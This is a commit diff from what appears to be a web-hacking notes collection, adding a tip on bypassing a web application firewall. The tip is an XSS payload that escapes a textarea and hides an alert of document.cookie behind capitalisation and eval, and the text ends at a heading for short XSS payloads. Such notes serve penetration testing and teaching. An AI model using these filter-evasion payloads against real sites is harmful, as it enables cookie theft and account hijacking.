GITBOOK-31: change request with no subject merged in GitBook

This commit is contained in:
Xalgord 2023-06-29 16:36:18 +00:00 committed by gitbook-bot
parent 4e72118a31
commit 267f08bd9b
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF

View file

@ -333,6 +333,12 @@ Heres a list of 7 useful techniques on how we can bypass WAF (Web Application
GET /?q=xss POST /q=xss
8. Try capatalizing alert function:
```
</textarea><img src=x onerror=”var pop=ALERT(document.cookie);; eval(pop.toLowerCase());
```
### Short XSS Payload:
```